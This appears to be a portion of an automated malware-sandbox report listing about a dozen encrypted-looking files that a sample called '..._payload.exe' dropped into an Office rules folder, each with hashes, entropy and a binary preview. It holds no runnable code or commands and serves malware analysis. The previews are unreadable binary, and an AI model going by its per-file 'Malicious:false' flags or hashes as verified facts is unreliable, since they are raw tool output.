                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1740
                                                                                                      Entropy (8bit):7.886871098203492
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:eZAFn/i1HfJ2YJFJHer3hY/vHWxbSb+eZJ0WXLZma0Q1HfWI3Sc8zzveBvWpb0Ya:1Fnw/4yFJgYG2+mFZmkiFmBJAwD
                                                                                                      MD5:B840FBB3F3E64642131345A62C4658EC
                                                                                                      SHA1:6D89A180F459A827D570DF4CC6F0FD3C5ECB57F4
                                                                                                      SHA-256:FFC700FD93A79346512A8D75851AFBA8FCD054AD5BBE7CE473B6BA3BCCCAD4D8
                                                                                                      SHA-512:F8F7B128E4A4B0D3E09790FB9E7A1D8078FDB12B50B9132818F49AE826F996A4D063F0A4441FEE3B8A7782428A2E837EFEC5E640F6E4B0FBC59338779F2D45C8
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlB.k.1...........xJ[.....U.Y.:i(..?..(5:g).....;.$4@....p...O..W..'.2km..J...B.<..X..Y..p.E....|y.e.....o!...y,a..V.y..C5{*.........$}.It`#.w|*.#....]V...s...+.....4q0..G..eK.zh....gu-.......}.B.rn=..?.;......[.8..@...D...i.N........3M.).O87.^.(".0..Z^....8w.....=.(a..v.|........q?.@k..W..q.0k........QC.wK....A..7Y...j^.a@..<...].u.A...U..2s5E..:..lO........n.A.......;....X.....{..f\i.8...}.4.........i..h..A.b.....<..|....l.`F.$a..Q..m...yq.Z.`..S[....es.v..k.M===j5...[..7..~...T.......-.Iw..WJ...".n@...p.."...U.j........{=5...k.$R..*..&Y...F..K.<.$$....Z.qo.:i.v........%.....B.#......@..%.2.R.....-.....&.....`..L.d.3..@..Pv....Q]..l4....)..../...jk..PB.............MY".... .7.+kz9..Pv.1.......u....XP..0%j..q......?;?+..J..[..|..3..Ok=.n>2,..G.....e9K.<mm..q.I]r.+..{.v3.`h...w.e..\...,...2...a.Rr....<......;.N.u.IxB`.1uQ.1.....r7$.....<.......vm..h.(.x...........R0,....t=XC.g..$+.\.4..>x.....;....;.J.....E5...2.9Y.......`.Lj.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701950v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1713
                                                                                                      Entropy (8bit):7.893163429417049
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:/vNzS/hSHFFfQs0imMqkd0ki4SFPDYu0w/WTkwD:JS/mFRtJCkitx0w/a9
                                                                                                      MD5:DAA132CEE5A7436B28401F1AB55473FF
                                                                                                      SHA1:534E3153D9E3A71ADEB10239EC76B08EEF3E73E8
                                                                                                      SHA-256:51A9F9F08E22B610EB8BA6C91F5300A048D5C53912F784769F3930E845673DC0
                                                                                                      SHA-512:31A35902C63020D62C0D326AE89D792E9E758F2A4CE089379E9D9C6052882A24239DB4F9B0041D01AA0733768B03E055FA5BC5A2EC98F78B69992E94DAC8EA7D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.R...P-c..K6.....-sQ.,G.....3.]0.+..!...2gh..T|.'..Q.ID\.tJ.9.Gw..W.7........=.k..q.......#.I..f?..U".D..qxxOA..eE......f.~..7w.......;.~M.....W.n.n..l.'k.h...M.x.a.>..}.\..r.84.(C.?..#..cd.A.T.&..xA..G..zj.Bl.a...W/........Gy4.....2)..8qs.o...d....c..n...LI.....Ip..R..!.....q?4^G..,.vE............bnC.....?..-..#7i\....@.=..4B<.o..I0.g.h...k.......S|.a...q.a{Vm....K.\.!.a.j<.....R..t..<|..,.:.......k.x...-.a.M...{.^z.......7......4|M^&p^.I.u...e$.........R....|R+.}%@k??.Tp.....AM.....).b...C7.\.....;.........B.Ut......5db.j.o..{>.?...~...$...o...3.........z..c,BDdq.u;l...o...4...r.H.p..[Kn.Y0$..u.....IF~.|X...:/.....0.ZB.r@...3.fv.]..TC..LHT.v...8-..$...{iO...-...|b.<....\T.G.*l5..k..U...u/..h..wV.&..QG...}...h.6....Dt/u.x.......E...W...uH.YMR......-R?....~j.#M.h..&.....)1u?..11..Wv.....>.{...h....>aU.....}..CpYy...N........0~Q'..A$..b"M...A2...".B"q.h.......F!tq+...[.e..E..&......D.......:....3}.O.#......IH,....w.[/.K..rg....a.b...@.3..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701951v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1750
                                                                                                      Entropy (8bit):7.884552788365475
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:trTJLO5MdwMcw9FBE7VQHbGqIMn4rkGoLZpmwwD:FTdOADcw9FuVQqzU4PV
                                                                                                      MD5:EA03E9B9B1245AB00BC592E814738493
                                                                                                      SHA1:77C4F8404D9E9BC745A1CDF12E1CFF14E397ADCC
                                                                                                      SHA-256:E8FA8AFB9CF465F32A289690EF95D7EA87054E9257B478CB1085E2539A10E1A0
                                                                                                      SHA-512:0D02EA4C9A8A4E6FA1D8AEDC75CD008BCA19386D5BF04DC445EBD64655F8967496132AF06D27B867351EF70B2B07066595A87F8F938D47DA7D1CD96FC9686942
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmloAR...c.$......*....C.X(...D.}.m....D.VbJ..@AV_..4..x..x...=..V.+UB.['T.Lm.f.......'.....t.^[.%......._.i.G..W;H...0RSXg.Q7.Ep...(.?Xp.{6K.&.4..bNe.l.Z.....n.]_..'....)Z.1y_...j.../z.%..]..n)2....._L}d..0.#.....pD.....k....w...wl~.....Oau..k...-.V...NWV.....A........Na?FAC........S8*.C".|.oF..0(#...#.....K...4.\....[......@s.?U@N.f..H.*...K...|VZ>WF..._..h.]..3.Z..'.h.un7...._x..."....KM..)V..'y..`..7Z.H7.L/w.4/E6w.s..c.(?.Nx.&.*...T..*m......d&.d({o.e=..R.....j...n&..'.|.y.:.....N*.......#..9I.k3....6..{..'..l.....*...x.!k...9....6...h.R}..B..C.=...N.0.".M..r{A.Mu.m.`.9]_./>qN{.1.,.7.sA.XO......;...F.Dh.4.#.-\)..m...Vz...D..k.....^.:V...Q..c.'$.....3.v.....M....&...F?......>..F..LO..I.o..H..?..P.75.<....."`L.[..8.."...t...`S...r../.Z...8+.>..T|B0.......P.......Ae.r..2..o.5...0<.U......>.$..w=/...y7W..!..N.9.x#...m.j.=b*. ..z...{7i..9..."@z...G.s.g....<l...ktN.sE...8?I......,.X.....zM...zv.....Y..........+.+#.w..u.3..g...=...F.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702000v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1693
                                                                                                      Entropy (8bit):7.88689722540573
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:gAYWex4fJt8Xh9qmf7pWxqlQW2ThRcIzzjDwD:YqSqC7GqeNvNjo
                                                                                                      MD5:FFEE5DC265E835D63A9F647FD8353E17
                                                                                                      SHA1:7BB28FB96B40A0DAE63005D7386C5D8A8B477170
                                                                                                      SHA-256:2AF49957171627A5E876DCABFB291A99C8A650124BE8E0AA37A96EED7F0A874B
                                                                                                      SHA-512:F2F501628936425938F2779AE808EBCE919C78AB155F03980917D84756BD8A10B54EE3EBC54BB28A7115701B8658883D887B49104B6518508F25B1BBF071897A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..W...D)1o..OhP:.l3n...nK...o....<.fe.$,F. .1.u.....M......|......^)...[.Ck.lwNYg.pz.:DY...4qa.w.*...yO...E?U:.=~...o..#...l.../..-..."N...("1..Y6-......j..;8)T......4J....G\iM.MH..>]~O.;..Bd6..*.E6...d~......,..m.B..b%]a..q..*..Xx...$3..l...D...s..w..0v..x..`.<....-^I.K..}R/.....r;.?@.n.....*...O.g..\.F...*..)Y6..~1.....u.u..0P.8..@d`..G.J.S...Ld.,...I.%..h.)V.....VsWc6...D....u`...P...y.u_..C'.(..=...>.(.j..._...(`.]..nV....t...S....2...JT..Y;............+|.d@.<9....n.6..D. ....6B0"tR...l..r.No$A......uEw.......J.|..I.h....t.j`..'.......p.....#P!..f.$.....?.\."`.83...SW$.,.. .../..6....I.I.......-...fmT....T.h....e..M)..ygv..?8......d../}.i..........8.[U.S....wWn..f.N..8-...........A.&..I...p..^6.?]y&...... ...~.M.[p8[.g....*O...5.+n..SA....9a./.McuB..$..hj..#.*.B..qG....=2.E[z..3..I..xX..Zn..doK.d.j{.u.....to....>...1.0j..S$F........p..Z..]......../.....~..fV.....~.N/.rB.A.Lq.G........a..`.N./kL5.6........I.7.d.V.>g....c;

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702001v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1730
                                                                                                      Entropy (8bit):7.875873744106605
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:I47JcjmJj+6jrka8GFi4vNgLa7PQyvIIjYScK/bGcMXdld4y8v6bD:I47PJj+uka8GMbLUPJAIMTUidlay8wD
                                                                                                      MD5:5DB8151F0FCB95767A8ADE3230BA820F
                                                                                                      SHA1:BA78E02C91A54DF7B7C442C9284FD1A41EEF6976
                                                                                                      SHA-256:454A8DBFFD24583ADE7C7783FBAD835A5A58447697907E03CFEB1A6636E07212
                                                                                                      SHA-512:8CD87028DF859ED0B38CE81026C87D8386D369A6275BE3DE212C3B1BA929B3CE690440BBA8073F3168C8FCA648E9E9B9E17EE95EB6C2339551B9CC52173449B7
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...L...(..}...~1S.#.K.....R..d..X^E.m.z.YK.(....Q.T.feJ....N4:..q=F(..*.D.Za.=...;9../%@....'[...kJ..t_^..fZ&M.;f..q...&...z...9.....o?o9a...&.~..z.j..u...o^.._dy...!.cy>../.J.6/FI..0,..)...........b|....V.WT.."........Q.Q.:.]HP.I....r-.I=.+ux.j..PV.....0...$$!...:...bx.T-fF......V....Q..G..Im.._G...2.kY..-1.C..x.3=...}U'..... sz..C..a.}..i0I...H.......UF...'q.....N.-w..0...~e.x.}.P*Q.;..5&..@Gu|7C.!..|...t .M0n..Ao.Q.~..Z.C..\2....o....d..=0.B...O_}}T....v..L`..M.... ..a..Y...+"....q4.\..a.y. ..'...K.NhaQ.8......QK... .h..w..J~..h\6[A...!.%..a.e.M..?.^TMY.c.;..v..S.8H ...4...3.v.....4.....n..\..:"_.n....(.(@...45b..b..q.aWBz.N..s.S..[\z...(....Oo.y.y.P0.cu3....$.......p...|.g..B.X 3.n..1....(._..uN.....9i.!.....(x.v..!....G....,...S.P..R.....^^m]....(.V...%\9.V...=z)4W....T^1.L. @}..!.~.S.a.?Wi$...wu....;.%..yL..<...........k(.^...!...tA...W..J....z../P...3$.....,-.......r.N.......EB.....{Y.....+.?A}.pV..e..NQ...o......J..u.$.2.<]_..j

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702050v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1697
                                                                                                      Entropy (8bit):7.885614122590448
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:sZuANX4opkW2p+pSpPSl466DQ1z6bFFetn7tJHAQ5TY7cwheIzNNncFkdsv6bD:Qu00gjaczeF4RhT+RNN4oswD
                                                                                                      MD5:E8A97E8474C89A823F2699790B539D06
                                                                                                      SHA1:D325086BDF69A7E05AC725E445AC0945E9EE7FA4
                                                                                                      SHA-256:D2BCC32570B398F249147D1EDDB5649D11F1A149062FED42C33B02015A5F810D
                                                                                                      SHA-512:B7BB44322FEFE46F92F04928CDE5FFECCC79445C5C9D6E155FC7FC13CD7FFD9143D201A60022D836CA1821BD247D3845E07D68425413F40606F220A4A95A61C5
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.IKw..g...n..2U......s;...3h.+..k.(.&..t....{.5F..'.w...'=..e"../..N./.P.J.sKM..M&....6H.u.t.B...p.WP.@.....l.J..w!..../.7qP.=.0+<..c .<.....Z).(....=.."..p._..;:.....q....~.B(.....`..E.m..b5.o....."..A....{}..t....:)..-|GBf..Z....W...5..<._K|2p...-.2..../y.A..l+..K?._....P./Ha..v\.S...H.\g.,.E...k<.Ks.L..|."...]...r.._...zfEn.....^.0``?..7......d.#.n$..U<J...[R........>;..2...Cq...a..?..%..7.0..X....Ofc.E.0..bB1q...=.8..._.f.Tn.M.AA.1F.w....]Q.j8........U<.1.r.$....8,.R.H...(...Q...e..@.....%.?`.!J...._.... .....@..do..f..{Y..~.4..*..........K....Wd,........B.g.B.I2...f.'..1..=.V.^....@.r.U.6h..&.....-.\.0..5.C..........o..9.T..|d.......Op...c.....w`...iaG...E.z...I.L..<.:...f`....g(L..>..[N....F....h.......k.r.... 5i.....Y.......x...bt.}........s...w.i3.i........R~....o...h.J]^...D....T.M.0...]..J$.^.DP...v@.[..;.=./..v."_rdw.........P.].f|O.../!......2..>......8H^CL./1..O|.(....\!..t8.R....H..R..*.3rP..]..;../.....:..e..F}...N.."D.st.c

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702051v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1734
                                                                                                      Entropy (8bit):7.876474458870127
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:nFWuFRYfbH3+lU7cxhaqjZboYCvaBx4f3qtdpwD/krNtYhrvrCuyee9y1dkkue8s:FWuLsHIjhoYCiBYRD/0ehrvdn+y1f8wD
                                                                                                      MD5:2A37CA1B9E99CB3D6D40B4D4813EF9E6
                                                                                                      SHA1:26BBC6F870D2140EFDAEF6DFD6563499943F8FD8
                                                                                                      SHA-256:B7FA9AF80DA863DAA7A9341E72885A7FDFBF076D3B1010BBEB66C7395654D0E1
                                                                                                      SHA-512:8908BE8905558F58FA96B77D40DFFDF03001F706D0C40644B4EA9EAC37D88CFEEA84190DD88B3B7BB4F10B8B0A33EA0E8D605EF85595B1D4C3233F6566DC7ECA
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlQ..sa..i.......t.$............x............L..m..c......d.x]....j.q.)..P.E.E.L.+...B,..a...J.}gZ.]....m.3.].[..........r.j..*......6...h'.}.9...o`..?.>j.;.|Hq......0.dqu...r. w.y..!L...3ZL5.C.}....[_.?..A.%E#5c..d.......z......E=....].Z..n;.&......4q.......h..DB.R..xE ..).......a.0.5Z.-us%F]..d.J...`R..*.%+.S.G_I..C...,`n.r..d.G.;N..0.lQl ...-..|....[.+1p,.o..T.Kk.....3TkG..m.m.L.W......4.WM..... a.dc.&.. .....@.....0Ty.l.!.._F.*]-c..].A..#...H...ch~mr........6..?.....1.............-....a.'...L....SrEd..P..%..H-...4n0...5....T...w..c.....E....P..l`f.Nr.......O..a6.Jp.h..;$...D.2!......Y.V...f.d,R...2....&...M......W.Ljw....y;",&U)|.BeM..)".\......ZW.&..udm....V.z..k.R*...X.....[.ea.1.U.....N0.:.....%.........)...*&<H.......X\..=.3.p.Y....O...oq..^h.fd...#' .|......MeK......k.....r.=.N1.....o....*-.wc..un...T.....}.J39 .....t..|...]..cI.B.>)...%........[...QG.@....?..$...8}....@.1gB.e..w....4. ..s...\.E............J....T..G....].....h.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702100v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1704
                                                                                                      Entropy (8bit):7.864373479713935
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:VF088b8aNAqOr/LfmYdxOdbo5sWXc/V0DJY/OfN8wD:V9Y8iAq6LzOdOECJIuT
                                                                                                      MD5:A27A5BB384BF5817B68A0D28C19DE504
                                                                                                      SHA1:82DE18AE75E4699FBC0A928F49502EFAF652852E
                                                                                                      SHA-256:D908406CC5AB6D947BFCF547ACBDB76F156F353270BF832732ABE5E66838341B
                                                                                                      SHA-512:4C5CF540B84267B58BB354ED37C3B33F8A7CF01CFAE223EECB302A26CA623F74667A48C753E0BB75CBDC62EA061C40E3E13949FAA94F32C7E99D575006B8FD64
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...!...=......a,z1..-.......=.0.=....+.....Y.;].!q.........E{.)5! -=..7&.$........b*.1.jb......I...+.*w..../.Q.U!j>.7...S..KR.P.m..4......W...W_...n...../....f.*.&{vs.g.2.2.AYO..L...!.A.zz#p....[..\..*..j.' DV.Z2.w$....a.Hjc....."...$..l...A.....il.mR../...=.5.Lu........x......#....@}.:.{.:u.....n......W.%....m..;...5.}..Vm..1G..T.:....P......g....~_..-....o<a.....8.......|.-x....vA.=...D....!1s..F.......]d=..u....A.........)?..K...v.3.*M.~....$..B......./...i...y...<g..P\.=4.}............S..S...P.I.-.......n..n...J....CdH..#...s.RO...........H*.}P....W..|...4..%0.Vc.-.....c..tW.f._.m...i2k]!.P}.o.$#Y...vCDN.(.O ...B.qS...v.3(.W-......e87.TK.Q*.P...|...A=KY....U........v.(:o.w..a......z.;......TB ..JK..OD...q.b.Zi......@D [...W..7;.zb)..}..}...g.&l[_.$...t.a..f.w........Hq...d..7.lJ.W.....k..tD.e/.r......t ..=..j...k6.U.TU.:nz.zV)........_'...u'24Re.."e....lAZ+..J"=......$.%......Y>..rBG......!!n.m...+%....+."K..r.|-!D<.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702101v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1741
                                                                                                      Entropy (8bit):7.8696819996226886
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:FAIi3Nlbpa27txGidGiW+mpuHaBKII5qwD:FATlbpltIiMiWVN1Y
                                                                                                      MD5:4B183F6360ED1DF464317F57DDDDA3FA
                                                                                                      SHA1:253263090048A4685B93E3F48E9D66385F3C9CBA
                                                                                                      SHA-256:D9F2DDBDC9281584AB1D4AD1D7FC603B73AE0201AFF8A6716CAE3B26D2DE38AB
                                                                                                      SHA-512:84F7D1EAAF392943F8B552A574D39E22E684CDBBE1FE5A396CEFD7E81B88042037571286A8719EE4AADFF1862393E77CB2F54134F1FDD6EEA9CBFF87184ADED0
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.I=A....{E.. .......`....?.oR}?...0...e.t}.|`..6]...xo+1..*..|n..C..ny}F.N..%.H.w...y....B....#O~.>o.r...Xv...:!....Z.../)...n.R..B.n..r|\...5H...!...<F..i?_(...x..;F.....g.@.T?U...e. \....L.Ty.+uq..K...D..u.Y.DIT..a.uW..|%.|.e..D2B #W..D.&...])hw,.....%..U.*.*P...=..e1...Z..f.B.]..+8."..hf..3...D....de..?.6.i.,a..9/.o.}.G.....j...R.A;'+..U=x..........B.......5...;..{D..x-.{'j....Zq+!j.X.>C.K0.Q_D=X.'..;*N.WC^H.O..y..".l.+?1...&.;'."<.......#.c.vArf.......#[....."...V..`..w"y.$..k.e..2.L..fC...\....f.(.cw.1.Hi........9..k..4.....6.:S..#Q:m..G....*6.Z....._B....g........d3..E...<.....#......."..Ix...*V ..".dN......-...b.Jy.m.r.X2wV...E.l...U.vp.D.0wV9...s........4..y...5U.:C...fx.*.....jE..C..P...,m..H{8... ...w..W8%.2.V.?,Y.K( .....EE.....'.h/..p...]...@...bl.C.B<sf..ak..........Fw..aR..?...pO..y..)....ex P..#..d...,.a).t...u'..7....z._.H..*+...a..l....4....4.....Ka..]..E....$...o.[..*.=.8oF..@.h..m-.6|.Gy.:.[........{.6.<....X9S

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702150v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1693
                                                                                                      Entropy (8bit):7.8939397526448865
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:JYGqdq1C+dqurHj0TRiU3BmInENvHhqLapYrhfxwD:JYTvLurD3UxmInEaLyY16
                                                                                                      MD5:5132E09B1D33EC393E1ABA983ED02B8B
                                                                                                      SHA1:B4F016AAD30CA43A527A7BDAFBF5FE00B66E2B59
                                                                                                      SHA-256:0E622DFD8EA3C90B215B50EA14161BFC0379FCD820ED9CA7084359FD2181F17B
                                                                                                      SHA-512:B5C798FFD0365C518D92EA4363CAC4AA43313E0CCF168CE7FAC45BCACEF3A639EB9FF0F3A32E8583F4FEEBA4FE690482530A4A33D50235E475F8E25B08AF7BEE
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlP...$j.x.G....u...,..6....I?.!...z...)....p.-...N.t7Vg...........@.i.o..<.V. /.....[..M....Ytw...>j.....:.J..;.d.lZ...X...|.O.9..D.yXwA.u.m.9......!...?..E..$_u.@ ..E.q?...:..)a.&.z._._W(..M..KI..=.'C.ex.}..P...H.e.4%...1..._C1.,..o.......cM.........N..C.Eu.ztSu.;/.c.{...b.A.g.9....AF.....\.><{#?.F.RS.._.z|.u'..y.....'7%.;..........)....'...*oU..............'Z.....UM..4 ......AV.N+3.u...{..1..r...$}MQev...rN.5B;.....N0.yCsGo..y.h.U....B...0l...(U..%.(..OK. ..z.q..".B..}u..ox.....`Y.).R..t........#r.......{...Z...W.}{.#...ST..c.@.;V.F..:u.O./..6.e....\.......y.....!.L.3..P6...=.?6..:~C...]..K.&|.Yg8.O0.+..\_rO&v... .M.<........../FF.Qaw..AK..7..N....[...k.G..&.M...J..Q..A%T.C..<..P.^.j.!.xW......PL..R..Q...-..F.8u.....F....*!.X..%$/(?L=I.g.(..._.^.1T[..}..T"..6Mo.(........bJ.......|.%SH..X..vuw5..s........DR..if...=.W..+v)P...[....;......8.l...eP.....z!.R..l.....-..6]+...D...'Ku....:w.N.._....,.........RD....~...hp..G>.z.0.&...D)..u...X

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702151v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1730
                                                                                                      Entropy (8bit):7.893752676371068
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Ah5i1fq32tAxPboFxZpXQbqyc9yYzFAqS5zDoeaVhYa2CBok5l7I40dncRov6bD:Aa1fO2tK8FBQ+xjFAV5HtUB0dcCwD
                                                                                                      MD5:3515622CDCB4FCBBCB806671D7941605
                                                                                                      SHA1:1E1C2BF62834F2A7DB83A2453E691AC503E6DF1D
                                                                                                      SHA-256:5A1180C9F443A1B857DC7AA3C13F18FE1C75E65B708A0447B2DEED6D2D0A95CF
                                                                                                      SHA-512:FB02685077899F49C680135CA11BEF826BAB8041330EA0135E005F590D2EF83148D58AA0F70EB3C0E361F80983F326D5D166981661A10C84BA9A178187829EA8
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..7.....r....[.:....E.c.Qa.....[..^....wB.........d.C.......o0.\.>.]=...>..b.w.Z...:V.Yk&&^..^..."....(.-R.g.~<j..gs"t.{:n...b.!.8~n\.U.Z....B..~.'..P`!~.....P.D...<C..T.eg.s....Q@.t.DKY_zO.. x@_.Nr.q.dX3.. $N....e...A.I..d..P.gW.....\.x..?-0..l.W-K.\..N..K.3q1.V.......d..F......&.a..v..2Nz8...C.c+,...z....6.*...R;.u..q..N|>..>.j....J.|cT.&..k.7....."h.....U.G|....x.....<.n.~}.,...O...@..3.a.....#A.......w....^.3...m}..c...=:.$.......62W.l..?......>.....iRgl..<.t=....j..VG...W..n3...ABz\..S..d9...B~./..$./v.n..|S..F..e.3.4."Y.N.1l...t!.ro!..a..u...A.G..V.<..=..yJ..m*.?.'...g.{t..,2.&..~W6.\........&._.V.K.7I..H.O......1ek.....(.7?...4YT..W..y1m5.Q...."......d......#Ae..:.".Na#a."..*{..*..+..m..X. Kj....L,../.l.v...<7.....4'..s...,...V..^..G..aPmsy.2.:0M......a..XK..Z7....k.c...$tfP.d.E2...r......r.mWy.....q$%..5Xp?..M.xU..>/Z..<u#W..M`.O.f..6...;...(..s@d.[....#?Jr.<Y...a.Vt.$...X..g.g.:.hO.59.!.$"....<..<0..c.n..gJ........0b.u..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702200v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1693
                                                                                                      Entropy (8bit):7.8748751356948254
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:wiPfvhDKHWHBHOuWv1wBWcpC0fCAIXb3KFQwD:wipDBNOzwjKRrKX
                                                                                                      MD5:C828D8C5FBE18A8853C7F826A3876EC6
                                                                                                      SHA1:A7442721E44A78F63C22E7EBC1A8947624E39789
                                                                                                      SHA-256:0861CE5E7FFAD5D4A6A3E56DBD25FE82E25B9D40C18C6C7FE9A8F4F15C54BE25
                                                                                                      SHA-512:3313DBF49CEE7E78884403C313C38BF1BC30D01B44C1AC403A759A2C680A361B85D36520F0B2B1C25000EBD749157DBCAB75F2109C94422C4874FB22A806F503
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....b1..l<..B......%...j.L.J(....D.....2..r...;.1m.yVS.................=.3>....%.....U.'N.Q......mb{..V.....Y.l...W..S.....d...s..>g..G.m_1.r..g..f....*...a.[..WV...r....4.[......!...^f...cHvu.(....C..q.`,x.d..f..[.....3M.W...gf..V[\...W...{u.I..6.ab!.g...i.w].C.R.d\5.@=.1A...R.R..x..}e...l.....7i7kRg.x..m./.V.s .a.....C.....b.....#. %.....]....z!...Y.....'.U.T.........u.l.G..Eq.....h.......s...^.6'.M...:..".E.H_.y.mm..E..Q8^..Z....6!..v%*G_.......R/.C..5.....1..l/..$._<.O......]..T....w;H...K.. Y.=qU..!.....C~u..IlsY[q.....@[++...R=.e.:...I.L...K.M...../LD.]....H..1.}".M/..eG;_fn.%... 6.6.tFY.>.od0uyEa.....Q..>..).i=.%.S.2A.....!...l..x.TRa.[~l$.._.o.:y?..&.....P.B&.../......C..=.j....A8b}...yz......u.2.R...(....W.;..l.#...31O........n...P...+n....F.....f...ie.s0'....N.%....D[N.h.pK8..o"...%.~,L,........<X.V]..y...z.qt..Gc........C1m.kF..rO..rN.G.QL...8.3..u0B..g.x..4...r-..A.T.H.J.......kf.C5S$...^8.0Du.Z.Ho..t.0W.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702201v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1730
                                                                                                      Entropy (8bit):7.888153683465971
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:9X+wztTgg/F+hE2P+SRVaSBtiA/6Y9xSwD:9VdcOOCSiA/6KxX
                                                                                                      MD5:FA28703C2611D16C31748E57AC507EA4
                                                                                                      SHA1:ED76BD90883DF43468FE398984970FC5C0298AB3
                                                                                                      SHA-256:60E0AA8191073E8638CE49993783E8A4AA842AF80679400922C73C5F611F5AA3
                                                                                                      SHA-512:6E86F1AE3B151ACC13B7B4C14BB0B6C8E42AAC9F28DFDB1FBD4A54AADBF89A18B96C50AE6895F905D98C0C7DCD2989AC6217C96620D2DD82232D1C7D3E76E215
                                                                                                      Malicious:false
